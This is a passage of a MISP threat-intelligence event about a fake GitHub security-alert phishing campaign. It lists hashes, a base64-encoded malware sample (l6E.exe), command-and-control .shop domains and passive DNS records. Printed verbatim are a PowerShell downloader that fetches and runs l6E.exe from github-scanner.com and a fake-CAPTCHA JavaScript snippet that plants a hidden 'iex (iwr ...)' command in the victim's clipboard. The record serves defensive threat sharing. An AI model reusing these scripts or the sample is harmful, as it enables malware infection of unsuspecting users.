"value": "2024-09-18T14:21:22+00:00"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "imphash",
"timestamp": "1726726646",
"to_ids": true,
"type": "imphash",
"uuid": "6db30d41-a16f-4ac2-9cf5-b0d48eaff212",
"value": "f34d5f2d4577ed6d9ceec516c1f5a744"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "authentihash",
"timestamp": "1726726646",
"to_ids": true,
"type": "authentihash",
"uuid": "1d257c52-8c76-4010-ac6c-e27e1027b683",
"value": "07b89ccdef9eb2727f8eae56769c60b0a84b8de906ea9ac71cdc53f7fc9608fd"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "original-filename",
"timestamp": "1726726646",
"to_ids": true,
"type": "filename",
"uuid": "b4de9a26-17e6-4a37-b59a-143356fb3e2f",
"value": "VQP.exe"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "internal-filename",
"timestamp": "1726726646",
"to_ids": true,
"type": "filename",
"uuid": "8c694015-4eab-4976-940b-5c94e4ae8385",
"value": "VQP.exe"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "file-description",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "fbaad43f-920b-4027-a5be-6c840a6b9e0d",
"value": "outfawned"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "file-version",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "33516c79-64e8-4be2-b3f5-3e02070d92ec",
"value": "1.0.0.0"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "product-name",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "e3687afb-d40e-4e70-9d68-9b253e3c29a6",
"value": "Shopman Stairs"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "product-version",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "25544ba1-ca57-451b-8d53-9bcaba29eafd",
"value": "1.0.0.0"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "company-name",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "4d5c602b-baf5-47d6-9b26-8078913044d8",
"value": "listening triskelion"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "legal-copyright",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "71911504-5c43-47c8-987d-ca0ef9c38087",
"value": "Copyright 2024"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "lang-id",
"timestamp": "1726726646",
"to_ids": false,
"type": "text",
"uuid": "e49ecab7-0f2b-49fd-993b-0c4038510a97",
"value": "000004b0"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "number-sections",
"timestamp": "1726726646",
"to_ids": false,
"type": "counter",
"uuid": "df46f806-039b-43c9-949e-7940e9677c40",
"value": "3"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "24",
"timestamp": "1726730923",
"uuid": "5c92fd4e-765a-418a-bc4c-9b1bc9db3fb6",
"ObjectReference": [
{
"comment": "PE indicators",
"object_uuid": "5c92fd4e-765a-418a-bc4c-9b1bc9db3fb6",
"referenced_uuid": "6772a782-f051-4a2a-b3e3-2a6794dcd31d",
"relationship_type": "includes",
"timestamp": "1726726646",
"uuid": "02975bc7-e7f5-44ae-8f9e-8995da4c84fb"
},
{
"comment": "",
"object_uuid": "5c92fd4e-765a-418a-bc4c-9b1bc9db3fb6",
"referenced_uuid": "e30308ed-ee19-4cbf-b182-5911f2d26412",
"relationship_type": "references",
"timestamp": "1726730923",
"uuid": "7b0e1f9c-5932-42d9-a514-9ccec55fa8ed"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "filename",
"timestamp": "1726726646",
"to_ids": true,
"type": "filename",
"uuid": "03a54551-ef3f-4d3d-94b9-e1f1b05797a2",
"value": "l6E.exe"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1726726646",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "4eb5422b-853e-4bd2-b79e-b9156b9d25d9",
"value": "354168"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1726726646",
"to_ids": false,
"type": "float",
"uuid": "cf670fde-5817-476a-8444-38ff1ddb908d",
"value": "7.9876324425692"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1726726646",
"to_ids": true,
"type": "md5",
"uuid": "649ea781-49c8-42ca-95f3-4e261ffb00dd",
"value": "fac2188e4a28a0cf32bf4417d797b0f8"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1726726646",
"to_ids": true,
"type": "sha1",
"uuid": "7b7bbfbf-77e1-4486-9cbc-8a0a6bb6906d",
"value": "1970de8788c07b548bf04d0062a1d4008196a709"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1726726646",
"to_ids": true,
"type": "sha256",
"uuid": "ee6cf775-2c5e-41cc-8398-7b8a993bd8b3",
"value": "d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1726726646",
"to_ids": true,
"type": "sha512",
"uuid": "1414687e-4729-4781-ad6e-383994fdb459",
"value": "58086100d653ceeae44e0c99ec8348dd2beaf198240f37691766bee813953f8514c485e39f5552ee0d18c61f02bff10c0c427f3fec931bc891807be188164b2b"
},
{
"category": "Payload delivery",
"comment": "",
"data": "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
"deleted": false,
"disable_correlation": true,
"object_relation": "malware-sample",
"timestamp": "1726726646",
"to_ids": true,
"type": "malware-sample",
"uuid": "7a11deb6-a929-4ab0-925f-e69c8a3e866c",
"value": "l6E.exe|fac2188e4a28a0cf32bf4417d797b0f8"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "mimetype",
"timestamp": "1726726646",
"to_ids": false,
"type": "mime-type",
"uuid": "7b3b1b89-3ab4-4256-b2b8-a2c8951858eb",
"value": "application/x-dosexec"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1726726646",
"to_ids": true,
"type": "ssdeep",
"uuid": "5a633cf6-3216-48af-82dd-7bda9cfaa65a",
"value": "6144:HDd+O7VyIqZiQUa+I0st4nlSVbiWN6VqWeqfn3Zsz9HMiobZYK1QE:B+O5yIqxwI3tFOqWeqcYbZYzE"
}
]
},
{
"comment": "",
"deleted": false,
"description": "An IP address (or domain or hostname) and a port seen as a tuple (or as a triple) in a specific time frame.",
"meta-category": "network",
"name": "ip-port",
"template_uuid": "9f8cea74-16fe-4968-a2b4-026676949ac6",
"template_version": "9",
"timestamp": "1726726838",
"uuid": "8ad8f83d-4f64-4a66-8849-e6b3fe938725",
"Attribute": [
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "domain",
"timestamp": "1726726838",
"to_ids": true,
"type": "domain",
"uuid": "0761838c-13be-455e-88e5-a8c88c3a2bcd",
"value": "tryyudjasudqo.shop"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "domain",
"timestamp": "1726726838",
"to_ids": true,
"type": "domain",
"uuid": "96019ec0-7a73-4e50-8a31-fadc0bf3a72f",
"value": "eemmbryequo.shop"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "domain",
"timestamp": "1726726838",
"to_ids": true,
"type": "domain",
"uuid": "b8a86b3b-2884-4876-ad1a-a1fc3d377fe1",
"value": "reggwardssdqw.shop"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "domain",
"timestamp": "1726726838",
"to_ids": true,
"type": "domain",
"uuid": "d82f04b5-e13e-4617-a187-af7c45e1911d",
"value": "relaxatinownio.shop"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "domain",
"timestamp": "1726726838",
"to_ids": true,
"type": "domain",
"uuid": "cd905563-1cd7-47fe-9d6a-b76907cab55b",
"value": "tesecuuweqo.shop"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "domain",
"timestamp": "1726726838",
"to_ids": true,
"type": "domain",
"uuid": "71dea917-03bf-4fd3-bef7-dd3a1d064e59",
"value": "tendencctywop.shop"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "domain",
"timestamp": "1726726838",
"to_ids": true,
"type": "domain",
"uuid": "9b7a887b-0c1d-4dac-8f7f-ab73d93e3d44",
"value": "licenseodqwmqn.shop"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "domain",
"timestamp": "1726726838",
"to_ids": true,
"type": "domain",
"uuid": "9309df55-45fe-4322-8a68-618af336c550",
"value": "keennylrwmqlw.shop"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
"meta-category": "misc",
"name": "script",
"template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
"template_version": "7",
"timestamp": "1726730834",
"uuid": "7b88da77-5001-4565-926e-965d55319a24",
"ObjectReference": [
{
"comment": "",
"object_uuid": "7b88da77-5001-4565-926e-965d55319a24",
"referenced_uuid": "5c92fd4e-765a-418a-bc4c-9b1bc9db3fb6",
"relationship_type": "downloads",
"timestamp": "1726730834",
"uuid": "4dc7896e-00bc-4d8d-a1b4-bb4cb520b87e"
}
],
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "script",
"timestamp": "1726726989",
"to_ids": false,
"type": "text",
"uuid": "7b6bcacb-97e4-4200-94f7-e39cb1a4ee76",
"value": "$webClient = New-Object System.Net.WebClient\r\n $url1 = \"https://github-scanner.com/l6E.exe\"\r\n $filePath1 = \"$env:TEMP\\SysSetup.exe\"\r\n $webClient.DownloadFile($url1, $filePath1)\r\n Start-Process -FilePath $env:TEMP\\SysSetup.exe"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "language",
"timestamp": "1726726989",
"to_ids": false,
"type": "text",
"uuid": "e9d2727f-bb5f-49ff-b196-f523f1c143ea",
"value": "PowerShell"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "state",
"timestamp": "1726726989",
"to_ids": false,
"type": "text",
"uuid": "c792f415-8b1e-49fe-9e77-593a6e238118",
"value": "Malicious"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Email object describing an email with meta-information",
"meta-category": "network",
"name": "email",
"template_uuid": "a0c666e0-fc65-4be8-b48f-3423d788b552",
"template_version": "19",
"timestamp": "1726727277",
"uuid": "6cf75a0e-8809-4ba1-9e06-0de7f5815935",
"ObjectReference": [
{
"comment": "",
"object_uuid": "6cf75a0e-8809-4ba1-9e06-0de7f5815935",
"referenced_uuid": "3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94",
"relationship_type": "contains",
"timestamp": "1726727277",
"uuid": "ef997087-c070-4d65-aa4a-9ec1cc6ceffc"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "email-body",
"timestamp": "1726727040",
"to_ids": false,
"type": "email-body",
"uuid": "204433bc-866a-4ac8-8095-0c51a9e4e447",
"value": "Hey there!\r\n\r\nWe have detected a security vulnerability in your repository. Please contact us at https://github-scanner.com to get more information on how to fix this issue.\r\n\r\nBest regards,\r\nGithub Security Team"
}
]
},
{
"comment": "Enriched via the url_import module",
"deleted": false,
"description": "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata.",
"meta-category": "network",
"name": "url",
"template_uuid": "60efb77b-40b5-4c46-871b-ed1ed999fce5",
"template_version": "9",
"timestamp": "1726728232",
"uuid": "3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94",
"ObjectReference": [
{
"comment": "",
"object_uuid": "3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94",
"referenced_uuid": "a4e7b874-225e-4206-9cf8-f858854d4ca5",
"relationship_type": "contains",
"timestamp": "1726727307",
"uuid": "4d11b161-dcc6-426d-bb6d-aeee576f1b39"
},
{
"comment": "",
"object_uuid": "3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94",
"referenced_uuid": "b53c8423-c8a7-4863-a01a-3e9eebcb199f",
"relationship_type": "describes",
"timestamp": "1726728232",
"uuid": "c6d0bd80-b149-43ef-b8a3-cff513549922"
}
],
"Attribute": [
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "url",
"timestamp": "1726727073",
"to_ids": true,
"type": "url",
"uuid": "a889be3a-cd6d-4582-aca5-4b47acee01c3",
"value": "https://github-scanner.com"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "tld",
"timestamp": "1726727073",
"to_ids": false,
"type": "text",
"uuid": "e97a04ed-820b-4d27-9877-dab4f3706a2c",
"value": "com"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "host",
"timestamp": "1726727073",
"to_ids": true,
"type": "hostname",
"uuid": "c5945acf-d875-4cb0-9fdd-798c53e0ea72",
"value": "github-scanner.com"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "domain_without_tld",
"timestamp": "1726727073",
"to_ids": false,
"type": "text",
"uuid": "8fc674dd-1ba4-4331-9622-17771b6fa6c4",
"value": "github-scanner"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "domain",
"timestamp": "1726727073",
"to_ids": true,
"type": "domain",
"uuid": "b822eb0e-9e8d-43a1-83c9-b4520e2dc332",
"value": "github-scanner.com"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
"meta-category": "misc",
"name": "script",
"template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
"template_version": "7",
"timestamp": "1726727155",
"uuid": "a4e7b874-225e-4206-9cf8-f858854d4ca5",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "script",
"timestamp": "1726727155",
"to_ids": false,
"type": "text",
"uuid": "87723a1d-4dcc-4c8f-90c6-26dbfa08994f",
"value": "<script>\r\n\r\n const verifyButton = document.getElementById('verifyButton');\r\n const modalBg = document.getElementById('modalBg');\r\n\r\n\r\n verifyButton.addEventListener('click', function() {\r\n modalBg.style.display = 'flex'; \r\n const captchaText = \"powershell.exe -w hidden -Command \\\"iex (iwr 'https://github-scanner.com/download.txt').Content\\\" # \\\"\u2705 ''I am not a robot - reCAPTCHA Verification ID: 93752\\\"\";\r\n const tmpTxtArea = document.createElement(\"textarea\");\r\n tmpTxtArea.value = captchaText;\r\n document.body.appendChild(tmpTxtArea);\r\n tmpTxtArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tmpTxtArea);\r\n\r\n\r\n });\r\n\r\n </script>"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "language",
"timestamp": "1726727155",
"to_ids": false,
"type": "text",
"uuid": "a31efa38-4aaf-440c-8bf4-f5ccd5946afb",
"value": "JavaScript"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "state",
"timestamp": "1726727155",
"to_ids": false,
"type": "text",
"uuid": "e31dfa80-27c5-450a-8665-ef4c15ce39f0",
"value": "Malicious"
}
]
},
{
"comment": "github-scanner.com: Enriched via the circl_passivedns module",
"deleted": false,
"description": "Passive DNS records as expressed in draft-dulaunoy-dnsop-passive-dns-cof-07. See https://tools.ietf.org/id/draft-dulaunoy-dnsop-passive-dns-cof-07.html",
"meta-category": "network",
"name": "passive-dns",
"template_uuid": "b77b7b1c-66ab-4a41-8da4-83810f6d2d6c",
"template_version": "5",
"timestamp": "1726728161",
"uuid": "74c5c23f-d5e2-4407-b36a-94bb95135a77",
"ObjectReference": [
{
"comment": "",
"object_uuid": "74c5c23f-d5e2-4407-b36a-94bb95135a77",
"referenced_uuid": "3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94",
"relationship_type": "describes",
"timestamp": "1726728161",
"uuid": "8ad0a005-514c-4df5-9bf5-476ec6a32053"
}
],
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "count",
"timestamp": "1726727232",
"to_ids": false,
"type": "counter",
"uuid": "a7146192-8420-4928-80cd-b7dd54b2d63a",
"value": "1"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "origin",
"timestamp": "1726727232",
"to_ids": false,
"type": "text",
"uuid": "d0ea57d4-b2df-4520-a130-592898e9143a",
"value": "https://www.circl.lu/pdns/"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "time_first",
"timestamp": "1726727232",
"to_ids": false,
"type": "datetime",
"uuid": "f5765243-a368-4412-93fe-fd5fc6b8bc4c",
"value": "2024-09-18T15:43:13+00:00"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "rrtype",
"timestamp": "1726727232",
"to_ids": false,
"type": "text",
"uuid": "7a458de1-9ea2-46bc-a784-f2853ac3f82a",
"value": "A"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "rrname",
"timestamp": "1726727232",
"to_ids": false,
"type": "text",
"uuid": "3f31fe30-22a8-4ec6-a58a-ba597d266087",
"value": "188.114.96.3"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "rdata",
"timestamp": "1726727232",
"to_ids": false,
"type": "text",
"uuid": "5e1f1f5f-e66e-4870-aad9-b483506fb6bb",
"value": "github-scanner.com"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "time_last",
"timestamp": "1726727232",
"to_ids": false,
"type": "datetime",
"uuid": "f24dc9c9-717f-423a-b6da-32542a4523fd",
"value": "2024-09-18T15:43:13+00:00"
}
]
},
{
"comment": "github-scanner.com: Enriched via the circl_passivedns module",
"deleted": false,
"description": "Passive DNS records as expressed in draft-dulaunoy-dnsop-passive-dns-cof-07. See https://tools.ietf.org/id/draft-dulaunoy-dnsop-passive-dns-cof-07.html",
"meta-category": "network",
"name": "passive-dns",
"template_uuid": "b77b7b1c-66ab-4a41-8da4-83810f6d2d6c",
"template_version": "5",
"timestamp": "1726730871",
"uuid": "a9e61709-f87b-460b-9b43-03e65c73158e",
"ObjectReference": [
{
"comment": "",
"object_uuid": "a9e61709-f87b-460b-9b43-03e65c73158e",
"referenced_uuid": "3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94",
"relationship_type": "references",
"timestamp": "1726730871",
"uuid": "c624854e-473a-47d8-b353-d7f6937bd1db"
}
],
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "count",
"timestamp": "1726727232",
"to_ids": false,
"type": "counter",
"uuid": "12c7a456-b9d4-462a-a5c8-51b4e97c56f1",
"value": "1"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "origin",
"timestamp": "1726727232",
"to_ids": false,
"type": "text",
"uuid": "4d6ba8b3-d4aa-419e-bdfe-8e3f81d7a13a",
"value": "https://www.circl.lu/pdns/"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "time_first",
"timestamp": "1726727232",
"to_ids": false,
"type": "datetime",
"uuid": "0581172c-fed8-4e53-88b8-b353eb7f0fe6",
"value": "2024-09-18T15:43:13+00:00"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "rrtype",
"timestamp": "1726727232",
"to_ids": false,
"type": "text",
"uuid": "98a3b004-8bf4-4ba6-a6ea-36d1db8b35ba",
"value": "A"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "rrname",
"timestamp": "1726727232",
"to_ids": false,
"type": "text",
"uuid": "2651f7af-b03f-4662-a834-50026d0f5fc3",
"value": "188.114.97.3"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "rdata",
"timestamp": "1726727232",
"to_ids": false,
"type": "text",
"uuid": "158e2135-3f8d-414b-98af-146c79c19cf1",
"value": "github-scanner.com"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "time_last",
"timestamp": "1726727232",
"to_ids": false,
"type": "datetime",
"uuid": "1834cdf2-5ec0-49a3-9614-f346c40b2a7d",
"value": "2024-09-18T15:43:13+00:00"
}
]
},
{
"comment": "github-scanner.com: Enriched via the circl_passivedns module",
"deleted": false,
"description": "Passive DNS records as expressed in draft-dulaunoy-dnsop-passive-dns-cof-07. See https://tools.ietf.org/id/draft-dulaunoy-dnsop-passive-dns-cof-07.html",
"meta-category": "network",
"name": "passive-dns",
"template_uuid": "b77b7b1c-66ab-4a41-8da4-83810f6d2d6c",
"template_version": "5",
"timestamp": "1726730850",
